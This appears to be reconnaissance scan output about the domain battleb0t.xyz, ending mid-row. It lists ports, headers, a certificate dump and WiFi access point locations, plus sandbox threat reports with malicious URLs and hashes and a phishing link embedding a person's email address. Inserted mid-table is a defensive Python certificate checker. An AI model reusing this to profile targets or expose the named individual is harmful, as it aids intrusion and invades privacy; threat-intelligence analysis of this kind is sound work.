| 2023-05-12 03:32:25 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.13:443 | 188.114.97.0/24 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | NotABug (Category: coding)
https://notabug.org/login | login |
| 2023-05-12 02:53:52 | BGP AS Membership | No | Censys | 0 | 0 | 2 | 0 | None | 54113 | 2606:50c0:8003::153 |
| 2023-05-12 03:23:50 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.20:8443 | 188.114.96.0/24 |
| 2023-05-12 02:54:19 | HTTP Headers | No | Web Spider | 6 | 0 | 2 | 0 | None | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "cf-cache-status": "DYNAMIC", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=edDiEwhb09qQfIsTtwWW7UDu1MTL3Si52Y7U9Wl3lDs5gxZDQPT8RjqeUYH5RKj%2BznpLhqhxC7IhGlKBCbb1RcMkuvy%2BQXyCAqu56mfTiAPJY0zM85v%2FwjqSATHbVC1%2FaGucnEby\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=0, must-revalidate", "date": "Fri, 12 May 2023 02:54:19 GMT", "access-control-allow-origin": "*", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "text/html; charset=utf-8", "cf-ray": "7c5f6059be52c402-EWR"} | fluid.battleb0t.xyz |
| 2023-05-12 02:44:24 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | github.io | 185.199.109.153 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | cf-cache-status: REVALIDATED | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "cf-cache-status": "REVALIDATED", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "etag": "W/\"79120efbf2a0b92da044ff91335c99c1\"", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=FXQU88yRDhEJMx%2FdYM%2F9ZMluhZXagjhG95IApBIpm7WqxobZm4CcFhtwU9d3QdUV9%2BbJoSdd48r6u2FX9%2FKZxhE4%2B1z8sAVQ0tKz2uiNE7MhIPsLxcBIQGzqQ1fObOLwdnHGyXAPA0tM\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=14400, must-revalidate", "date": "Fri, 12 May 2023 02:54:16 GMT", "access-control-allow-origin": "*", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "application/javascript", "cf-ray": "7c5f60483bb94334-EWR"} |
| 2023-05-12 02:54:18 | Linked URL - Internal | No | Web Spider | 0 | 0 | 3 | 0 | None | https://pics.battleb0t.xyz/images/master058_3.PNG | https://pics.battleb0t.xyz/ |
| 2023-05-12 03:01:45 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.241): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:58:15 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 65, u'compromised_hosts': [u'34.148.97.127', u'34.148.97.127'], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'http://favicon.io/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2648"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_a58_IE_EarlyTabStart_0xf0c_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_a58_ConnHashTable<2648>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_a58_IESQMMUTEX_0_303"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_a58_IESQMMUTEX_0_331"\n "\\Sessions\\1\\BaseNamedObjects\\{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2648"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_a58_IE_EarlyTabStart_0xf0c_Mutex"\n "IsoScope_a58_ConnHashTable<2648>_HashTable_Mutex"'}, {u'category': 
u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"34.148.97.127:80"\n "34.148.97.127:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"favicon.io"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar1705.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data 61712 bytes 1 file"\n "Cab1704.tmp" has type "Microsoft Cabinet archive data 61712 bytes 1 file"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: 
N/A]\n "RG184DMB.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\RG184DMB.txt]- [targetUID: 00000000-00003956]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003956]\n "~DF8145DA2F49859598.TMP" has type "data"- Location: [%TEMP%\\~DF8145DA2F49859598.TMP]- [targetUID: 00000000-00002648]\n "search_2_.json" has type "ASCII text with no line terminators"- [targetUID: N/A]\n "80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53]- [targetUID: 00000000-00002648]\n "NewErrorPageTemplate_1_" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776]- [targetUID: 00000000-00003956]\n "57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157]- [targetUID: 00000000-00003956]\n "~DF7BCFBE90A6F894E5.TMP" has type "data"- Location: [%TEMP%\\~DF7BCFBE90A6F894E5.TMP]- [targetUID: 00000000-00002648]\n "41F80EAD174A0E782E6E1DBBE6C32CE8" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\41F80EAD174A0E782E6E1DBBE6C32CE8]- [targetUID: 00000000-00003956]\n "ETLUKWGX.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\ETLUKWGX.txt]- [targetUID: 00000000-00002648]\n 
"~DF42B58D4878F8FC5E.TMP" has type "data"- Location: [%TEMP%\\~DF42B58D4878F8FC5E.TMP]- [targetUID: 00000000-00002648]\n "Tar1705.tmp" has type "data"- Location: [%TEMP%\\Tar1705.tmp]- [targetUID: 00000000-00003956]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "YU3Y19RW.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\YU3Y19RW.txt]- [targetUID: 00000000-00002648]\n "_0571D1C5-1D1B-11ED-A31E-080027B82EA8_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63]- [targetUID: 00000000-00002648]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Found decrypted SSL traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET / HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nDNT: 1\nConnection: Keep-Alive\nHost: favicon.io"- [Source: SSL_34.148.97.127]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "http://favicon.io/"- [Source: Input]\n Pattern match: "http://favicon.io"- [Source: Input]\n Heuristic match: "favicon.io"- [Source: PCAP]\n Heuristic 
match: "GET / HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nDNT: 1\nConnection: Keep-Alive\nHost: favicon.io"- [Source: SSL_34.148.97.127]'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-1', u'name': u'Sample was identified as clean by Antivirus engines', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 12, u'description': u'0/93 Antivirus vendors marked sample as malicious (0% detection rate)'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-22', u'name': u'Uses a User Agent typical for browsers, although no browser was ever launched', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 1, u'type': 7, u'description': u'Found user agent(s): Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-21', u'name': u'Malicious artifacts seen in the context of a contacted host', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 1, u'type': 7, u'description': u'Found malicious artifacts related to "34.148.97.127": ...\n\n URL: http://goldownloads.netlify.app/ (AV positives: 9/88 scanned on 08/16/2022 05:52:09)\n URL: https://legendaryrsps.com/ (AV positives: 1/88 scanned on 08/16/2022 04:34:51)\n URL: http://homeadvice.online/ (AV positives: 1/88 scanned on 08/16/2022 04:01:22)\n URL: http://fomotracker.xyz/ (AV positives: 1/88 scanned on 08/16/2022 03:18:58)\n URL: https://support-dapps.info/ (AV positives: 15/88 scanned on 08/16/2022 03:03:31)\n File SHA256: 
524180810d0b9764e5ef3923a8eb34b2ed8ca1923244be37e94ca57d889ede9b (AV positives: 56/75 scanned on 08/12/2022 02:05:05)\n File SHA256: 782eda6bdf7c6cb6067637f06c9a69c3fda5e4d6efbf7a744bc1b7574311d6ca (AV positives: 26/75 scanned on 07/31/2022 23:13:31)\n File SHA256: 53b6bcc44935e6141356b24f7e68b4970457269119a206c0a0b5d731f2e556d4 (AV positives: 6/74 scanned on 07/31/2022 22:52:37)\n | 34.148.97.127 |
| 2023-05-12 02:44:39 | Internet Name - Unresolved | No | DNS Resolver | 0 | 0 | 2 | 0 | None | tiktok.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:b3:d3:7f:a8:50:41:aa:70:38:c6:ab:16:2e:24:50:f9:66
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 29 13:55:16 2022 GMT
Not After : Mar 29 13:55:15 2023 GMT
Subject: CN=tiktok.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:ab:c7:1b:0c:ed:c6:01:f8:ea:a9:b3:cf:08:17:
4f:a2:cb:7c:34:c4:66:12:e6:ef:f3:98:17:79:c9:
65:ee:66:4c:1f:9a:92:7d:33:ee:07:fa:2e:15:62:
f7:b4:f3:1f:d5:4f:2e:b1:67:a8:49:42:bf:e3:cc:
9a:b7:30:46:c2:68:f5:28:a9:64:69:6f:4c:4b:64:
24:c9:dc:ed:46:9f:a4:1f:c2:ef:6f:36:d0:bc:69:
27:b8:e2:d6:18:70:40:2c:b4:f5:ee:8f:f7:0d:8c:
6e:03:92:e7:5d:d6:3e:bc:bb:c9:5b:28:10:a0:5a:
f6:37:f5:e1:9e:15:23:72:6e:8e:69:01:09:a4:8c:
a4:c9:d7:db:05:01:90:48:4b:90:20:8c:38:7a:0a:
60:74:79:18:26:30:8e:60:0b:17:b9:24:a0:80:df:
3f:14:00:d3:09:e7:34:47:35:63:7c:54:d2:a0:9d:
e1:57:d1:cb:13:d3:3c:30:24:97:8e:ea:34:00:9f:
cc:6c:0c:6a:f7:54:bc:5e:60:dc:46:31:c2:09:de:
d9:c3:e3:63:1e:8f:1c:c5:90:90:e8:da:86:be:7d:
f1:c3:1f:1a:86:69:9b:0b:e0:b2:0c:47:08:c8:92:
59:2b:66:2f:fa:a1:38:a1:2f:10:65:f6:97:fd:16:
87:33
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
63:4E:15:85:56:5A:A4:94:02:C2:16:42:A4:A5:97:9A:38:02:57:97
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:tiktok.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 6F:53:76:AC:31:F0:31:19:D8:99:00:A4:51:15:FF:77:
15:1C:11:D9:02:C1:00:29:06:8D:B2:08:9A:37:D9:13
Timestamp : Dec 29 14:55:17.050 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:28:6D:42:8E:49:9E:0C:06:C1:19:32:87:
BF:75:CE:80:8F:D6:EA:C5:3B:07:D6:4C:75:42:82:B7:
AF:11:51:87:02:21:00:AE:B6:AE:63:CB:FF:A9:BC:83:
A0:CB:D1:C6:02:EE:7B:8C:98:F1:37:20:95:B3:3D:3B:
1D:2E:39:2F:06:AF:D5
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9:
03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E
Timestamp : Dec 29 14:55:17.019 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:21:00:D9:21:B2:7A:EF:D8:EF:8A:6A:56:47:
07:FC:9B:67:B8:AE:3E:10:F9:AF:08:C7:4F:19:35:0D:
C5:86:2C:A0:FC:02:20:23:BD:B1:50:ED:06:FD:32:BC:
AE:E7:5A:20:25:B5:AF:2F:31:CA:1D:81:02:1B:A1:2C:
F3:DE:98:F2:29:F5:42
Signature Algorithm: sha256WithRSAEncryption
69:a8:61:13:18:01:a6:06:e2:eb:7a:7f:50:95:06:92:17:8d:
ca:63:d6:69:98:12:cf:b0:fa:ee:80:84:43:ff:f7:1f:35:fe:
72:06:36:88:ae:e4:77:27:a1:93:d1:eb:02:37:43:a8:e0:86:
61:58:2f:fd:b8:58:c4:fe:4d:1e:e7:cc:96:cf:0a:d5:16:48:
9f:46:b8:50:28:e1:ed:1e:1c:e8:de:90:ce:fd:33:bc:3a:3f:
eb:8c:75:a9:62:13:f7:4f:2b:08:b6:ff:b0:a0:90:34:79:dc:
8f:45:7a:05:74:fa:fc:67:dc:64:6a:b8:82:b5:d8:15:dc:e6:
30:a1:47:0a:e3:0b:70:53:63:1c:e4:bd:93:48:f8:f8:a9:29:
47:b8:8c:e0:2a:aa:34:51:c8:15:63:92:48:e4:5c:09:73:8c:
34:26:6a:c2:dd:6d:88:c9:62:37:c7:07:7b:a7:cb:0b:65:95:
3b:9c:ec:a8:8e:63:0a:23:39:ab:20:1d:fa:d0:19:f8:cd:6c:
5b:28:00:57:e4:27:6a:d2:8b:10:68:0f:2e:76:30:48:41:7b:
10:5a:d6:74:99:4a:28:13:dc:83:45:4c:b2:5e:dd:bc:a4:73:
29:47:2c:b2:ad:19:c4:e8:3c:a6:e9:8a:06:b9:d6:a7:ca:fd:
6d:cd:fb:dd
|
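The certificate attached to the unresolved name tiktok.battleb0t.xyz above is worth a second look: its Not After date (Mar 29 2023) precedes the scan timestamp (2023-05-12 02:44:39) by several weeks, so the name had both dropped out of DNS and let its Let's Encrypt certificate lapse, which is typical of short-lived throwaway infrastructure. The following Python is an added example, not part of the SpiderFoot output or of any tool on this page. It parses `openssl x509 -text` style output such as the dump above into the fields a triage needs and checks validity window, SAN coverage and SCT count against an observation time. The sample text is constructed from the fields shown above with the modulus, signature and log IDs omitted; the SCAN_TIME constant is the timestamp of the row that carries the certificate.

```python
import re
from datetime import datetime, timezone

# Constructed sample: the fields below are copied from the tiktok.battleb0t.xyz
# certificate printed in this scan table; the modulus, signature and log IDs
# are omitted because the checks here do not need them.
SAMPLE_CERT_TEXT = """\
Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number:
            03:b3:d3:7f:a8:50:41:aa:70:38:c6:ab:16:2e:24:50:f9:66
        Signature Algorithm: sha256WithRSAEncryption
        Issuer: C=US, O=Let's Encrypt, CN=R3
        Validity
            Not Before: Dec 29 13:55:16 2022 GMT
            Not After : Mar 29 13:55:15 2023 GMT
        Subject: CN=tiktok.battleb0t.xyz
        X509v3 extensions:
            X509v3 Subject Alternative Name:
                DNS:tiktok.battleb0t.xyz
            CT Precertificate SCTs:
                Signed Certificate Timestamp:
                    Timestamp : Dec 29 14:55:17.050 2022 GMT
                Signed Certificate Timestamp:
                    Timestamp : Dec 29 14:55:17.019 2022 GMT
"""

# Timestamp of the "Internet Name - Unresolved" row that carries the certificate.
SCAN_TIME = "2023-05-12 02:44:39"

_OPENSSL_TIME = "%b %d %H:%M:%S %Y GMT"


def _parse_time(s):
    """OpenSSL pads single-digit days with a space ('Dec  9 ...'); collapse it first."""
    if s is None:
        raise ValueError("validity field missing from certificate text")
    return datetime.strptime(" ".join(s.split()), _OPENSSL_TIME).replace(tzinfo=timezone.utc)


def parse_cert_text(text):
    """Pull the fields a triage needs out of `openssl x509 -text` style output."""
    def grab(pattern):
        m = re.search(pattern, text, re.M)
        return m.group(1).strip() if m else None

    return {
        "serial": grab(r"Serial Number:\s*([0-9a-f:]+)"),
        "issuer": grab(r"^\s*Issuer:\s*(.+)$"),
        "subject_cn": grab(r"^\s*Subject:.*?CN=([^,\n]+)"),
        "not_before": _parse_time(grab(r"Not Before:\s*(.+)$")),
        "not_after": _parse_time(grab(r"Not After\s*:\s*(.+)$")),
        "san": re.findall(r"DNS:([^\s,]+)", text),
        "sct_count": len(re.findall(r"Signed Certificate Timestamp:", text)),
    }


def assess(cert, observed_at, hostname):
    """Return the reasons this certificate should not be trusted for `hostname` at `observed_at`."""
    findings = []
    if observed_at > cert["not_after"]:
        findings.append(f"expired {(observed_at - cert['not_after']).days} days before observation")
    elif observed_at < cert["not_before"]:
        findings.append("not yet valid at observation time")
    if hostname not in cert["san"]:
        findings.append(f"{hostname} not covered by SAN {cert['san']}")
    if cert["sct_count"] < 2:
        # Browser CT policies expect at least two SCTs on a 90-day certificate.
        findings.append(f"only {cert['sct_count']} SCT(s); browsers require at least two")
    return findings


def assess_text(text, observed_iso, hostname):
    """Convenience wrapper: parse a dump and assess it at an ISO-8601 UTC timestamp."""
    observed = datetime.fromisoformat(observed_iso).replace(tzinfo=timezone.utc)
    return assess(parse_cert_text(text), observed, hostname)


if __name__ == "__main__":
    for finding in assess_text(SAMPLE_CERT_TEXT, SCAN_TIME, "tiktok.battleb0t.xyz"):
        print(finding)
```

Run against the sample at SCAN_TIME it reports a single finding, the 43-day expiry; the same checks applied to a live host should be done against the DER certificate with a proper X.509 library, since the text parser above trusts whatever the dump says and does not verify the signature chain.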
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Rick (Net ID: 00:0F:B5:14:80:C2) | 50.8897, 6.0563 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Clementine (Net ID: 00:02:2D:39:EC:00) | 37.7642, -122.3993 |
| 2023-05-12 03:32:08 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.5:443 | 188.114.97.0/24 |
| 2023-05-12 02:54:49 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://bcpzonasegurabeta.viabcp.com', u'type': u'extracted', u'verdict': u'malicious'}]}, u'total_processes': 20, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://llink.to/?u=https%3A%2F%2Frabetsanatkoosha.com%2FSNS%2Fmm.britishcouncil.org%2Fmonmon.myat%40mm.britishcouncil.org', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\SM0:3948:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:3948:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\ChromeProcessSingletonStartup!"\n "Local\\SM0:7384:304:WilStaging_02"\n "Local\\SM0:7384:120:WilError_01"\n "InternetShortcutMutex"\n "SM0:7384:120:WilError_01"\n "SM0:7384:304:WilStaging_02"\n "Local\\SM0:3948:304:WilStaging_02"\n "SM0:3948:120:WilError_01"\n "Local\\SM0:3948:120:WilError_01"\n "ChromeProcessSingletonStartup!"\n "SM0:3948:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:3948:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:3948:120:WilError_01"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.109.153:443"\n "172.66.40.106:443"\n "185.88.152.184:443"\n "35.186.254.174:443"\n 
"104.18.10.207:443"\n "142.250.189.228:443"\n "104.26.9.175:443"\n "172.217.12.99:443"\n "142.251.214.131:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"api.salesflare.com"\n "rabetsanatkoosha.com"\n "stackpath.bootstrapcdn.com"\n "track.salesflare.com"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"4e051b49-59db-4540-8b2e-31bf0ff2c4be.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\4e051b49-59db-4540-8b2e-31bf0ff2c4be.tmp]- [targetUID: 00000000-00003948]\n "Session_13322826248083631" has type "data"- [targetUID: N/A]\n "000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Sync Data\\LevelDB\\000003.log]- [targetUID: 00000000-00003948]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00003948]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003948]\n "edge_checkout_page_validator.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\3948_1394555003\\edge_checkout_page_validator.js]- [targetUID: 00000000-00003948]\n "f_00023d" has type "gzip 
compressed data max compression original size modulo 2^32 411849"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_00023d]- [targetUID: 00000000-00003912]\n "d632ab85-22c5-4d58-aa3b-6f1d5e994f5f.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\d632ab85-22c5-4d58-aa3b-6f1d5e994f5f.tmp]- [targetUID: 00000000-00003948]\n "7ae86b14-961b-4af0-b1f5-83780632a832.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\7ae86b14-961b-4af0-b1f5-83780632a832.tmp]- [targetUID: 00000000-00003948]\n "Filtering Rules" has type "data"- Location: [%TEMP%\\3948_931751445\\Filtering Rules]- [targetUID: 00000000-00003948]\n "settings.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Crashpad\\settings.dat]- [targetUID: 